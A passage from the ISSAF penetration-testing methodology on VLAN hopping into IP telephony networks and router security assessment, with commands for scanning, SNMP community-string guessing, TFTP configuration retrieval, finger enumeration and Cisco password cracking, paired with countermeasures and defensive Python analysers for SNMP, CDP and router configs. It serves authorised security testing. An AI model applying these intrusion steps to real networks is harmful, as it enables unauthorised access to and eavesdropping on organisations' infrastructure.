Any error seen on the switch, anomalous traffic or similar could be an indication of a wrong switch software version or a bug.
Countermeasures
Tool[s]
Further Reading[s]
Remarks
J.25 IP TELEPHONY CONSIDERATIONS
Description
Usually IP telephony is deployed by using a VLAN for its traffic all along the company network. Also reachable in this VLAN there must be some interesting machines, such as the Call Manager.
Objective
• Gain access to the VLAN used by IP telephony
• Reachability of the Call Manager and all the IP telephony equipment (to do further vulnerability identification, phone call listening, denial of service, etc.)
Pre-requisites
• 1 PC with operating system and NIC
• 1 IP phone, fully functional and connected
• 1 hub
Steps to be performed
With the hub, intercept the communications of the phone; there you can see the VLAN tag ID used for its traffic. Usually tagging your own traffic with this ID is enough to get your traffic into the IP telephony VLAN.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Vconfig
Further Reading[s]
Remarks
J.26 VULNERABILITIES IDENTIFICATION AND VERIFICATION
Perform this step based on ISSAF Technical Assessment Methodology section.
J.27 GLOBAL COUNTERMEASURES
J.28 FURTHER READING[S]
1. Research Report: Secure Use of VLANs: An @stake Security Assessment—August
2002, http://www.cisco.com/warp/public/cc/pd/si/casi/ca6000/tech/stake_wp.pdf
2. Cisco Safe, http://www.cisco.com/go/safe/
3. Best Practices for Catalyst 4500, 5000, and 6500 Series Switch Configuration and
Management http://www.cisco.com/warp/public/473/103.html
4. Multipurpose Dsniff, by Dug Song, http://monkey.org/~dugsong/dsniff/
5. SANS' outdated VLAN Security paper, http://www.sans.org/newlook/resources/IDFAQ/vlan.htm
6. ARP spoofing attack:
http://www.sans.org/newlook/resources/IDFAQ/switched_network.htm
7. White Paper: Catalyst 6500 Series Service Provider Feature (Private VLANs),
http://www.cisco.com/warp/public/cc/pd/si/casi/ca6000/tech/c65sp_wp.htm
8. An Ethernet Address Resolution Protocol, RFC 826, http://www.ietf.org/rfc/rfc0826.txt
J.29 APPENDIX 1: CATALYST SWITCH FEATURE SUPPORT
[Table: Catalyst switch feature support matrix. Columns (switch platforms): Cat 2900 XL, Cat 3500 XL, Cat 2950, Cat 3550, Cat 29XX G, Cat 4000 (Cat OS), Cat 6000 (Cat OS), Cat 4000 (IOS). Rows (features): Port Security, Private VLANs, STP BPDU, STP Root, SSH Support, VMPS Client, VMPS Server, 802.1X Auth, Wire Rate. Per-platform support marks (X) not legible.]
K ROUTER SECURITY ASSESSMENT
Description
Routed Issues
• Misconfigurations on individual routing devices are the same as on other hosts
• Product specific vulnerabilities
• A compromise on a routing device compromises entire network traffic
Routing Issues
• Without direct compromise of a routing device, it can be used to compromise the entire network
• Routing devices are used to direct network traffic, and any one router can be used to manipulate network traffic
Objective
• To assess end-to-end router security with target knowledge and/or without target knowledge
• To provide a single point of reference for router security assessment and countermeasures for identified weaknesses.
Requirement
• Understand the organization's environment
  o Understand router placement in the network architecture
  o Understand traffic managed by the router
  o Understand traffic passed through the router
Technical Requirements
• Knowledge of the basics of routing
• Knowledge of routing protocols for routing protocol attacks
• Specific technical requirements are given in each test case
Expected Results
• Information gathering about the router from the target organization
• Compromise on remote network through
  o Product specific vulnerabilities on the router
  o Misconfiguration on the router
  o Without direct compromise on the router
• Compromise on router through
  o Password cracking
  o HTTP access insecurities
  o SNMP insecurities
  o VTY/TTY access insecurities
  o TFTP insecurities
  o Console port insecurities
Methodology / Process
• Router Identification
  o Getting the router hostname
  o Port scanning
  o OS detection + versioning
  o Perform protocol scanning
  o Test packet leakage
• Assess common issues
  o Misconfigurations
  o VTY/TTY connections
  o Exec timeout
  o HTTP connections
  o Simple Network Management Protocol (SNMP)
  o TFTP
  o Finger
  o Cisco Discovery Protocol (CDP)
  o Network Time Protocol (NTP)
  o Access to console port
  o Password security
  o Loose and strict source routing
  o IP spoofing
  o TCP sequence predictability
  o Forged UDP packets
  o IP packet handling bugs
  o ICMP redirects
  o ARP attacks
• Assess routing protocols
  o Autonomous system scanning
  o RIP (Routing Information Protocol)
  o Open Shortest Path First (OSPF)
  o Border Gateway Protocol (BGP)
  o IRDP
  o IGRP
  o EIGRP (discovery)
• Assess denial of service attacks
K.1 ROUTER IDENTIFICATION
K.1.1.1 IDENTIFY THE ROUTER HOSTNAME
Description
Identifying the router hostname is for informative purposes only; it also saves you from typing IP addresses all the time.
If the router is registered in DNS, a reverse query on the router's IP address will give you the DNS name of the router. This DNS name might be the same as the hostname.
Pre-requisite[s]
• Target router IP address
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
• Do not register the router in DNS
Tool[s]
• Dig, nslookup, host…
Further Reading[s]
Remarks
Router entries are mostly never made in the DNS server.
K.1.1.2 PORT SCANNING
See the port scanning section of the ISSAF methodology. Scan router’s default services.
Port   Service   Protocol
23     Telnet    TCP
80     HTTP      TCP
161    SNMP      UDP
K.1.1.3 OS DETECTION + VERSIONING
Description
Finding the operating system and version of the router device allows attackers/penetration
testers to find specific vulnerabilities and possibly exploits as well. The expected results are
the router type & OS version
Pre-requisite[s]
• The IP address of the router
• A list of open and closed ports
Examples/Results
# nmap -sS -O -sV <router ip address>
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
• Nmap
Further Reading[s]
The following sections of the ISSAF methodology document: portscanning, operating
system scanning, banner grabbing
Remarks
K.1.1.4 PERFORM PROTOCOL SCANNING
Description
Performing protocol scanning against a router can identify what protocols (including routing
protocols) are supported by the router. This is needed for the routing protocols test further
in this chapter.
Pre-requisite[s]
Process
Examples/Results
# nmap -sO <router ip address>
Analysis/Conclusion/Observation
Countermeasures
• Only allow the necessary protocols
• Disable services which are not in use
• Implement a strong access control mechanism
Tool[s]
• Nmap
Further Reading[s]
Remarks
K.1.1.5 TEST PACKET LEAKAGE
Description
A Cisco router discloses its identity when a connection is made to port 1999 (TCP): it answers with an RST and the string “cisco” in the payload.
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Tool[s]
Further Reading[s]
Remarks
K.1.2 Test Common Issues
K.1.2.1 MISCONFIGURATIONS
Description
Verify the router configuration against common misconfigurations to find out what vulnerabilities exist in the router configuration itself.
Pre-requisite[s]
The router configuration or console access to the router has to be available.
Process
Examples/Results
# rat <router-configuration-file>
Analysis/Conclusion/Observation
The rat tool analyses the configuration file.
Countermeasures
Tool[s]
• Router Auditing Tool (http://www.cisecurity.org) for Cisco routers
Further Reading[s]
http://www.cisecurity.org
http://www.nsa.gov/notices/notic00004.cfm?Address=/snac/routers/cisco_scg-1.1b.pdf
Remarks
K.1.2.2 TEST VTY/TTY CONNECTIONS
Description
The simplest and most direct way to connect to the network device is to use a direct connection to the console port. VTY/TTY connections are used to attach a terminal directly to the router. In the default configuration of a router no security is applied to the console port. Also, the setup utility does not prompt the administrator to configure security for console access.
VTY/TTY access can be used in an insecure way. Testing this will allow the assessor to find out whether connections are possible through asynchronous or network connections to get terminal access to the router.
Several ports are available in addition to the standard ports. High ports 2001, 4001, 6001 can be tried on routers. Access control on VTY/TTY access is not really intuitive.
Most routers have five terminal lines. To get the most out of it, try 5 simultaneous connections.
Pre-requisite[s]
Some pre-requisites for this test are:
• Having the IP address of the router if this is going to be tested from the internet
• Having a phone number where a modem connected to the router listens
• Having console access to the router
• Port should be open and accessible from the attack point
Process/Example Results
The process to get access to the router:
• Try standard ports for telnet, ssh, rlogin
• Try the other ports found with the port scan
If a modem is connected to the device:
• Try dialing into the router
• If unsuccessful, try to bring up the terminal window (dial-up setting)
• telnet <Device IP address> <Standard/High Port>
• ssh <Device IP address> <standard/high port>
The minimum expected result is a login prompt; if the router is not secured, terminal access will be possible.
• User mode attack
Routers are configured for many different modes. In the case of Cisco, one mode is “user mode”. While accessing the router through VTY/TTY connections, the router first prompts for a password if one has been configured (by default it is not), and the user is logged into user mode on the router.
In user mode the router displays the hostname followed by the greater-than symbol. Example of user mode access:
TargetRouter>
Collect the password hash and decrypt it. CAIN can be used to decrypt it.
• Privileged mode attack
Commands in user mode are very limited. Enable mode is also known as privileged mode. To access enable mode, type the following:
TargetRouter>enable
If no password is configured, you get the following prompt:
TargetRouter#
You have fully compromised the router.
If the router prompts you for the password, perform password attacks.
Analysis/Conclusion/Observation
If telnet or rlogin is used:
• username/password is sent in clear text over the network
Countermeasures
• Don't allow telnet on internet interfaces of routers
• Don't use telnet for remote management of routers
• Use appropriate access control lists for remote management connections
• Place an access control mechanism on all the terminal lines
• Implement a user based access control mechanism
Configure a console password to authenticate users for user mode access by entering the
following commands:
TargetRouter#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
TargetRouter(config)#line con 0
TargetRouter(config-line)#password Y0urPassw0rd
TargetRouter(config-line)#login
TargetRouter(config-line)#end
• Some routers have a local user authentication database; it can be used to authenticate users who connect directly to the console port of a router. An example of a Cisco router using local user authentication is as follows:
!
username Miguel privilege 15 password 0 romancer
username Dieter privilege 12 password 0 Pr0mptM@n
username Rama privilege 8 password 0 rEc0n
!
line con 0
login local
transport input none
!
It is better to use an AAA server for all the authentication requests. All the authentication requests will be sent to the AAA server in encrypted form, plus the logs of the session will be maintained.
Tool[s]
• CAIN, http://www.oxid.it/cain.html
• telnet, ssh, HyperTerminal
Further Reading[s]
Remarks
K.1.2.3 TEST HTTP CONNECTIONS
Description
In many router implementations, HTTP is used for remote management of routers. HTTP is clear text, and even if a proper access control mechanism is implemented, passwords can be sniffed.
Pre-requisite[s]
• Web management port listening on the router
Process
• Check if the router is managed using HTTP: http://<device>
• Even if an access list is implemented, the password can be sniffed
Examples/Results
Put the screenshot of any router
Analysis/Conclusion/Observation
• If HTTP is used, the username and password are sent in clear text over the network and can be sniffed
Countermeasures
• Don't use HTTP for remote management of routers; use HTTPS instead
• Use strong access control lists for remote management connections
Tool[s]
• Internet Explorer
• Router remote management tool (e.g. Cisco Secure Policy Manager for Cisco)
Further Reading[s]
Remarks
K.1.2.4 TEST SNMP
Description
Simple Network Management Protocol (SNMP) is a boon for administrators who need it and know how to use it, and a curse for someone who is not really careful with it. Compromising SNMP community strings makes a major dent in the overall security. Guessing a community string with write privilege is similar to compromising a box.
In many router implementations, SNMP is used with the default community strings active or with an “old” version of SNMP implemented. Read and write accesses are available to routers. Some default strings are “public” (read access) and “private” (read/write access). The Cisco default string is “ILMI”.
SNMP v1 is insecure by nature. Tools like snmpsniff can be used to gather clear text community strings.
Pre-requisite[s]
• Port 161 UDP is listening and the service is accessible from the attack point
• Device IP address
• SNMP community string
Process
Outside to inside approach
• Identify community string
  o Try default community strings
  o Perform default community string attack
  o Perform brute force attack
• Gain router configuration by polling it
• If the private community string has been found, try to retrieve the router configuration file through TFTP (set up a TFTP server on your system)
Inside approach
• Sniff the traffic to identify the community string
• If the private community string has been found, try to retrieve the router configuration file through TFTP (set up a TFTP server on your system)
Examples/Results
• snmpwalk -m all -c <community string> <Device ip address> | more
• snmpnetstat -rn -c <community string> <device ip address>
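The description above notes that SNMP v1/v2c carries the community string in clear text and that defaults such as “public” and “private” are often left active. The following Python script is an added example, not part of ISSAF or of the snmpsniff tool: it decodes the BER-encoded header of an SNMP datagram (version, community, PDU type) and reports the weaknesses an assessor would look for in captured traffic. The datagrams are constructed inline with a small encoder; the OID, community strings and request id are sample values.

```python
# Minimal BER helpers for SNMPv1/v2c messages (short-form lengths, enough for the samples)
def _tlv(tag: int, body: bytes) -> bytes:
    assert len(body) < 128, "constructed samples use short-form lengths only"
    return bytes([tag, len(body)]) + body


def _int(n: int) -> bytes:
    return _tlv(0x02, n.to_bytes((n.bit_length() + 8) // 8, "big", signed=True))


OID_SYSDESCR = bytes.fromhex("2b06010201010100")   # 1.3.6.1.2.1.1.1.0 (sysDescr.0)


def build_snmp(version: int, community: bytes, oid: bytes = OID_SYSDESCR, pdu_tag: int = 0xA0) -> bytes:
    """Constructed SNMP datagram: version 0 = v1, 1 = v2c; pdu_tag 0xA0 = GetRequest, 0xA3 = SetRequest."""
    varbinds = _tlv(0x30, _tlv(0x30, _tlv(0x06, oid) + _tlv(0x05, b"")))   # one OID, NULL value
    pdu = _tlv(pdu_tag, _int(1) + _int(0) + _int(0) + varbinds)             # request-id, error-status, error-index
    return _tlv(0x30, _int(version) + _tlv(0x04, community) + pdu)


def read_tlv(buf: bytes, off: int = 0):
    """Return (tag, value, next_offset) for the BER element at buf[off]."""
    tag, length, off = buf[off], buf[off + 1], off + 2
    if length & 0x80:                              # long-form length
        n = length & 0x7F
        length, off = int.from_bytes(buf[off:off + n], "big"), off + n
    return tag, buf[off:off + length], off + length


PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap", 0xA5: "GetBulkRequest"}
DEFAULT_COMMUNITIES = {b"public", b"private", b"ilmi"}   # defaults named in the text


def inspect_snmp(datagram: bytes) -> dict:
    """Decode version, community and PDU type; list the weaknesses visible in the message."""
    tag, msg, _ = read_tlv(datagram)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, off = read_tlv(msg)
    version = int.from_bytes(ver, "big", signed=True)
    result = {"version": {0: "v1", 1: "v2c", 3: "v3"}.get(version, f"unknown({version})"),
              "community": None, "pdu": None, "findings": []}
    if version == 3:
        return result                              # v3 carries msgGlobalData/USM here, no community
    _, community, off = read_tlv(msg, off)
    pdu_tag, _, _ = read_tlv(msg, off)
    result["community"], result["pdu"] = community, PDU_NAMES.get(pdu_tag, f"0x{pdu_tag:02x}")
    result["findings"].append(f"SNMP{result['version']}: community string sent in clear text")
    if community.lower() in DEFAULT_COMMUNITIES:
        result["findings"].append(f"default community string {community!r}")
    if pdu_tag == 0xA3:
        result["findings"].append("SetRequest observed: write access in use on the wire")
    return result


if __name__ == "__main__":
    for dg in (build_snmp(0, b"public"), build_snmp(1, b"private", pdu_tag=0xA3)):
        print(inspect_snmp(dg))
```

Feeding the decoder with UDP/161 payloads from a capture (rather than the constructed datagrams) turns it into the traffic check the test case describes; any v1/v2c message seen at the border is itself a finding, and a SetRequest with a default community is the case the countermeasures rate as equivalent to a box compromise.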
Analysis/Conclusion/Observation
Countermeasures
• If the service is not absolutely required, disable it.
• Filter SNMP (TCP/UDP 161, 162) traffic at the border router. Allow only trusted subnets to poll or manage devices externally, unless it cannot be avoided.
• Consider community strings as important as passwords and apply the same best practices. (secret = secre?t)
• Try using SNMP v3 with message authentication and PDU encryption. If not possible, use SNMP v2; it uses MD5 authentication.
• Try to make MIBs read-only wherever possible.
An example of configuring SNMP security in Cisco routers:
1. Define the relationship between the network management station and the agent with the following command:
snmp-server community <string> {ro|rw} {number}
The number value references an optional access-list.
2. Use this command to configure the router to send traps to an NMS host:
snmp-server host host [version {1|2c}] <community string> <notification type>
3. Configure the type of traps for which a notification is sent to the NMS. You do so with the following command:
snmp-server enable traps [notification type] [notification option]
4. Set the system contact, location, and serial number. You can set the system contact with the snmp-server contact [text] command. You set the location with the snmp-server location [text] command, and you set the serial number with the snmp-server chassis-id [text] command.
5. Use the access-list command to specify a list of hosts that are allowed read-, read/write, or write-only access to the router.
6. Wherever possible, do not give write permission with the community string.
Tool[s]
• Snmpwalk (Linux)
• SNMP tools from the Windows resource kits
• Solarwinds tools (commercial)
Further Reading[s]
Remarks
K.1.2.5 TEST TFTP
Description
Trivial File Transfer Protocol (TFTP) uses UDP for data transfer; it is a connectionless protocol which doesn't support authentication. TFTP is a limited FTP service with no authentication. It supports a very limited set of commands. It is commonly used by routers, switches and other devices to connect to a TFTP server during firmware upgrade. On a lot of routers, TFTP is used to fetch and push configuration files to these routers. Attackers can abuse this possibility to retrieve the router configuration file. TFTP is insecure by nature since it is plain text and can be sniffed.
Pre-requisite[s]
• TFTP client
• TFTP server IP address
• Password sniffing tool
Process
• Identify TFTP server(s)
• Sniff for clear text password(s)
• Identify router name (nslookup <device IP address>)
• Download configuration file by guessing its name
Examples/Results
• C:\tftp <tftp server> get <devicename>.cfg
Analysis/Conclusion/Observation
Countermeasures
• TFTP is plain text; consider using secure TFTP as an alternative.
• Restrict access to the TFTP server in your firewall / router
• Move sensitive files from their default locations
• Define access level on files
  o In case of Linux: /etc/tftpaccess.ctl
• The TFTP server should be implemented on the same protected network segment as the device using it.
• Passwords should be encrypted using MD5
Tool[s]
• Any TFTP client
Further Reading[s]
Remarks
K.1.2.6 TEST FINGER
Description
Finger services expose system user information to any entity on the network. Finger works on port 79 TCP/UDP by default.
• Helps an attacker to guess user accounts by guessing usernames.
• Informs an attacker whether a user has new email.
• Helps an attacker to guess the operating system.
By default finger is enabled on Cisco routers.
Pre-requisite[s]
• Finger port open on the router
Process
#finger -l @router-ip-address
#finger -l root@router-ip-address
Examples/Results
# finger <IP address of router>
Login: root
Name: root
Directory: /root
Shell: /bin/bash
On since Mon Oct 13 22:06 (IST) on tty1 54 seconds idle
On since Mon Oct 13 23:53 (IST) on tty2 17 minutes 4 seconds idle
On since Mon Oct 13 23:39 (IST) on tty3 4 hours 56 minutes idle
On since Mon Oct 13 23:39 (IST) on tty4 4 hours 56 minutes idle
On since Mon Oct 13 22:06 (IST) on :0 (messages off)
On since Mon Oct 13 22:34 (IST) on pts/0 from :0.0
50 minutes 6 seconds idle
On since Tue Oct 14 04:20 (IST) on pts/2 from 203.124.156.112
30 minutes 15 seconds idle
On since Tue Oct 14 00:46 (IST) on pts/5 from :0.0
1 hour 7 minutes idle
Mail last read Tue Oct 14 04:04 2003 (IST)
No Plan.
# finger <IP address of router>
Login: broot
Name: Mr. Root
Directory: /root
Shell: /bin/bash
Last login Wed Jan 30 09:43 2002 (CET) on console
No Plan.
Login: nonroot
Name: Non-root root user for NFS
Directory: /nonexistent
Shell: nologin
Never logged in.
No Plan.
Login: root
Name: Mr. Root
Directory: /root
Shell: /bin/sh
Last login Wed Jan 30 09:43 2002 (CET) on console
No Plan.
Analysis/Conclusion/Observation
• Finger daemon is running on the target system
• root user is logged into the system
Countermeasures
• Strongly recommended to block the port on the external interface of the router/firewall.
• Run the service on a non-standard port
• Disable the service on the router if not used
• Disable finger on border routers
• Use access control lists on the finger port
Tool[s]
Further Reading[s]
Remarks
Example given in the test result is from UNIX section.
K.1.2.7 TEST CDP (CISCO DISCOVERY PROTOCOL)
Description
Cisco Discovery Protocol (CDP) is a layer 2 protocol used by Cisco routers to discover each other on the same link (segment). This protocol is not routed and therefore is only useful in the local segment. CDP messages contain information about the sending Cisco router. These include the device ID (hostname), port ID (which port the sender used), the platform running on, the software incl. version, what the box is capable of and which network address (IP address) the interface has. If not configured otherwise, Cisco routers send these messages out every 30 seconds. In our case (Ethernet), they are sent to a special MAC address (01:00:0C:CC:CC:CC) and therefore are received by every Cisco router in the same segment. Other routers store the data and hold it for a time defined in the message (the tool uses the maximum of 255 seconds). Very interestingly, Cisco IOS uses the device ID as the key to find out whether the received message is an update and the neighbors are already known or not. If the device ID is too long, this test seems to fail and you constantly fill up the router's memory.
CDP is enabled by default on Cisco routers. Any directly connected system can determine the Cisco model number and IOS version.
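To make the frame format described above concrete, the following Python script is an added example (it is not part of ISSAF and not the Phenoelit tool): it recognises a CDP announcement by its destination MAC and LLC/SNAP header, decodes the TLVs that carry the device ID, port ID, platform and software version in clear text, and applies a detection rule for the memory-filling condition the text mentions, an over-long device ID. The frame, MAC addresses and the 64-byte threshold are constructed assumptions; the CDP checksum is left at zero and is not verified.

```python
import struct

CDP_MULTICAST = bytes.fromhex("01000ccccccc")        # 01:00:0C:CC:CC:CC, from the text
SNAP_CDP = bytes.fromhex("aaaa0300000c2000")         # LLC/SNAP: Cisco OUI, PID 0x2000 = CDP

# TLV type codes used in CDP announcements
TLV_NAMES = {0x0001: "Device ID", 0x0002: "Addresses", 0x0003: "Port ID",
             0x0004: "Capabilities", 0x0005: "Software Version", 0x0006: "Platform"}


def build_cdp_frame(src_mac: bytes, device_id: bytes, port_id: bytes,
                    platform: bytes, software: bytes, ttl: int = 180) -> bytes:
    """Constructed CDP announcement (checksum field left as 0, not verified below)."""
    tlvs = b"".join(struct.pack("!HH", t, 4 + len(v)) + v for t, v in
                    ((0x0001, device_id), (0x0003, port_id), (0x0006, platform), (0x0005, software)))
    cdp = struct.pack("!BBH", 2, ttl, 0) + tlvs      # version 2, hold time, checksum
    llc = SNAP_CDP + cdp
    return CDP_MULTICAST + src_mac + struct.pack("!H", len(llc)) + llc   # 802.3 length field


def extract_cdp(frame: bytes):
    """Return the CDP payload if the frame is a CDP announcement, otherwise None."""
    if len(frame) < 22 or frame[:6] != CDP_MULTICAST or frame[14:22] != SNAP_CDP:
        return None
    return frame[22:]


def parse_cdp(payload: bytes) -> dict:
    """Decode the CDP header and TLVs; every value is carried in clear text."""
    version, ttl, _checksum = struct.unpack("!BBH", payload[:4])
    info = {"version": version, "ttl": ttl, "tlvs": {}, "malformed": False}
    off = 4
    while off + 4 <= len(payload):
        t, length = struct.unpack("!HH", payload[off:off + 4])
        if length < 4 or off + length > len(payload):   # length includes the 4-byte TLV header
            info["malformed"] = True
            break
        info["tlvs"][TLV_NAMES.get(t, f"type 0x{t:04x}")] = payload[off + 4:off + length]
        off += length
    return info


def cdp_findings(info: dict, max_device_id: int = 64) -> list:
    """Detection rule with an assumed threshold: flag oversized device IDs and bad TLV encoding."""
    findings = []
    dev = info["tlvs"].get("Device ID", b"")
    if len(dev) > max_device_id:
        findings.append(f"device ID of {len(dev)} bytes exceeds {max_device_id}")
    if info["malformed"]:
        findings.append("malformed TLV encoding")
    if "Device ID" not in info["tlvs"] or "Port ID" not in info["tlvs"]:
        findings.append("announcement lacks Device ID or Port ID")
    return findings


if __name__ == "__main__":
    frame = build_cdp_frame(bytes.fromhex("0011223344aa"), b"core-rtr1", b"FastEthernet0/1",
                            b"cisco 2621", b"Cisco IOS (constructed sample)")
    info = parse_cdp(extract_cdp(frame))
    for name, value in info["tlvs"].items():
        print(f"{name}: {value.decode(errors='replace')}")
    print("findings:", cdp_findings(info))
```

Run over frames captured on an access segment, the decoder lists exactly the inventory the test case says any directly connected system can learn, which is the argument for the “no cdp run” / “no cdp enable” countermeasures below.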
Pre-requisite[s]
Process
Use a “cdp sniffer” to find information of the Cisco Discovery Protocol.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
• Disable CDP if not required
  o no cdp run: disables CDP globally
  o no cdp enable: disables CDP on an interface (interface command)
• Highly recommended to disable at border routers/switches etc.
Tool[s]
Phenoelit CDP tool
Further Reading[s]
Remarks
K.1.2.8 TEST NTP
Description
The Network Time Protocol (NTP) is often used on border routers and it is enabled by
default. A lot of companies use the border router to synchronize internal servers with it and
let the router connect to external time servers.
A potential attacker can corrupt time if enabled.
Pre-requisite[s]
NTP Port is open on the router.
Process
Try to synchronize the time of your system with that of the router to see if ntp is enabled on
the router.
Examples/Results
• ntpdate <ip address of router>
Analysis/Conclusion/Observation
Countermeasures
• Use access control lists on the NTP ports
Tool[s]
• ntpdate
• Any other NTP client
Further Reading[s]
Remarks
K.1.2.9 TEST ACCESS TO CONSOLE PORT
Description
If physical access is possible towards the router, then an attacker could perform this test.
Connecting a laptop with a serial cable to the router’s console port is what he/she has to
do. This is an important test since most console access on routers is not protected by any
password.
Also, because “execution timeout” is not so often used on console ports, attackers can abuse this by simply connecting to the console port.
Pre-requisite[s]
Physical connection to the router
Process
If no password is configured => access will be granted.
If a password is configured on the router => Password Recovery while Reboot (Ctrl +
Break) – see the cisco website for details for each router type.
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
• Physically secure the router (put it in a locked rack)
• Password protect the console access to the router
• Configure exec-timeout on the console port
Tool[s]
• Laptop & serial cable
Further Reading[s]
Remarks
K.1.2.10 TEST PASSWORD SECURITY
Description
Refer to the Password Security Assessment section of ISSAF.
Router passwords are stored in the local configuration file. These passwords should be encrypted using XOR or MD5. Other passwords are in the file as well (HTTP, SNMP strings). Configurations/configuration files passing through email, TFTP or VMPS are vulnerable to sniffing attacks. Weakly encrypted passwords can be easily cracked using tools like Lepton's Crack or CAIN. MD5 protected passwords are vulnerable to dictionary attacks.
Pre-requisite[s]
• Sniffer
• Hash gathering and password cracking tool
• Assessment machine
Process
• Sniff data to test for configuration files passing across the network in clear text via email/NetBIOS/TFTP etc.
• Download password files and identify the passwords
• Sniff MD5 hashes and encrypted data
• Perform dictionary attacks on MD5 hashes
• Decrypt encrypted passwords; many times you will find weak encryption (Cisco type 7 passwords)
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
• Configure “enable secret” passwords for enable password encryption (for Cisco routers)
• Configure “service password-encryption” for other passwords
Tool[s]
• Lepton's Crack
• CAIN
• Sniffer
• Sniffer with VQP decoding capability
Further Reading[s]
Remarks
K.1.2.11 TEST LOOSE AND STRICT SOURCE ROUTING
Description
The path of a packet (outbound and return) is defined in the packet itself. It is of two types: 1. loose source routing and 2. strict source routing.
Loose source routing: some hops (routing devices) in the path are defined and the rest are as usual.
Strict source routing: every hop (routing device) in the path is defined, from start to end.
Pre-requisite[s]
Packet crafter
Examples/Results
Use the ping utility with the source routing options (on Windows: “ping -j <hosts>” for loose and “ping -k <hosts>” for strict source routing).
Analysis/Conclusion/Observation
Countermeasures
• For strict source routing: “no ip source-route”
• For loose source routing: “no ip redirects”
Tool[s]
• ping
• Netcat
• VSR
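The Router Audit Tool named in K.1.2.1 checks a saved configuration against the kind of weaknesses the preceding test cases list one by one. As an added example (not ISSAF's and not the RAT tool's code), the following Python script performs a small version of that audit on two constructed Cisco IOS configurations: it parses global commands and the “interface”/“line” stanzas, then reports the items from K.1.2.2 (telnet, line authentication, exec-timeout), K.1.2.3 (HTTP management), K.1.2.4 (default or read-write community strings, no access-list), K.1.2.6 (finger), K.1.2.7 (CDP), K.1.2.10 (enable password without enable secret, type 7 passwords, no service password-encryption) and K.1.2.11/K.1.2.14 (ip source-route, ip redirects). Both configurations are sample data written for this example; the community string, ACL number and hash text are placeholders.

```python
import re

# Constructed sample running-configs; values are placeholders, not from any real device.
WEAK_CONFIG = """\
enable password 7 00000000000000
username admin privilege 15 password 0 admin123
ip http server
snmp-server community public RO
snmp-server community private RW
interface FastEthernet0/0
 ip address 192.0.2.1 255.255.255.0
line con 0
 login
line vty 0 4
 password 7 00000000000000
 login
 transport input telnet
"""

HARDENED_CONFIG = """\
service password-encryption
enable secret 5 $1$PLACEHOLDER$constructedhashvalue
no ip source-route
no cdp run
no ip http server
access-list 10 permit 192.0.2.10
snmp-server community Xk9-Zq2-Lm7 RO 10
interface FastEthernet0/0
 ip address 192.0.2.1 255.255.255.0
 no ip redirects
line con 0
 exec-timeout 5 0
 login local
line vty 0 4
 access-class 10 in
 exec-timeout 5 0
 login local
 transport input ssh
"""

DEFAULT_COMMUNITIES = {"public", "private", "ilmi"}   # defaults named in the SNMP test case


def parse_blocks(config: str) -> dict:
    """Group lines by context: 'global' or the 'interface ...' / 'line ...' stanza owning them."""
    blocks, current = {"global": []}, "global"
    for raw in config.splitlines():
        if not raw.strip() or raw.lstrip().startswith("!"):
            continue
        if raw.startswith(" "):                   # indented: belongs to the current stanza
            blocks[current].append(raw.strip())
            continue
        line = raw.strip()
        if line.startswith(("interface ", "line ")):
            current = line
            blocks.setdefault(current, [])
        else:
            current = "global"
            blocks["global"].append(line)
    return blocks


def audit(config: str) -> list:
    """Return findings for the weaknesses described in the router test cases."""
    blocks = parse_blocks(config)
    g = blocks["global"]
    has = lambda prefix, lines=g: any(l.startswith(prefix) for l in lines)
    findings = []
    if has("enable password") and not has("enable secret"):
        findings.append("enable password used without enable secret")
    if not has("service password-encryption"):
        findings.append("service password-encryption not set")
    if has("ip http server"):
        findings.append("HTTP (clear text) management enabled")
    if has("ip finger") or has("service finger"):
        findings.append("finger service enabled")
    if not has("no cdp run"):
        findings.append("CDP not disabled globally")
    if not has("no ip source-route"):
        findings.append("IP source routing not disabled")
    for line in g:
        m = re.match(r"snmp-server community (\S+) (RO|RW)(?: (\d+))?$", line, re.I)
        if m:
            comm, mode, acl = m.groups()
            if comm.lower() in DEFAULT_COMMUNITIES:
                findings.append(f"default SNMP community {comm!r}")
            if mode.upper() == "RW":
                findings.append(f"SNMP write access for community {comm!r}")
            if acl is None:
                findings.append(f"SNMP community {comm!r} without access-list")
    for ctx, lines in blocks.items():
        if any(re.search(r"\bpassword 7 ", l) for l in lines):
            findings.append(f"{ctx}: type 7 (reversible) password")
        if ctx.startswith("line "):
            if not has("login", lines):
                findings.append(f"{ctx}: no login authentication")
            if not has("exec-timeout", lines):
                findings.append(f"{ctx}: no exec-timeout")
            if ctx.startswith("line vty") and not has("access-class", lines):
                findings.append(f"{ctx}: no access-class on remote management")
            if any(re.match(r"transport input (telnet|all)", l) for l in lines):
                findings.append(f"{ctx}: telnet allowed")
        if ctx.startswith("interface ") and has("ip address", lines) and not has("no ip redirects", lines):
            findings.append(f"{ctx}: ICMP redirects not disabled")
    return findings
```

Calling audit(WEAK_CONFIG) lists every weakness planted in the first sample while audit(HARDENED_CONFIG) returns an empty list; the same function applied to a configuration obtained through the SNMP or TFTP test cases gives the assessor a first pass over K.1.2.1 before reading the file by hand.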
Further Reading[s]
Remarks
K.1.2.12 TEST IP SPOOFING
Description
By using IP spoofing, an attacker can circumvent IP access control lists (mostly configured on routers) by assuming someone's identity.
There are multiple techniques available for IP spoofing, which are as follows:
• Domain Name System
• TCP sequence number prediction
• Packet forging using UDP
• Source routing
On the router, a packet with an internal address originating from the external interface is considered a spoofed IP packet.
ACLs are used on the router; if no access control lists are used, then this test has little use, since it would definitely be possible to perform IP spoofing.
Pre-requisite[s]
Process
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
• Create an access control list on the router which denies packets with internal IP addresses originating from the external interface of the router.
• Many routers provide an inbuilt safeguard for this
• Limitation
  o IP spoofing from the internal network is still permitted
Tool[s]
Further Reading[s]
Remarks
K.1.2.13 TEST IP PACKET HANDLING BUGS
K.1.2.14 TEST ICMP REDIRECTS
Description
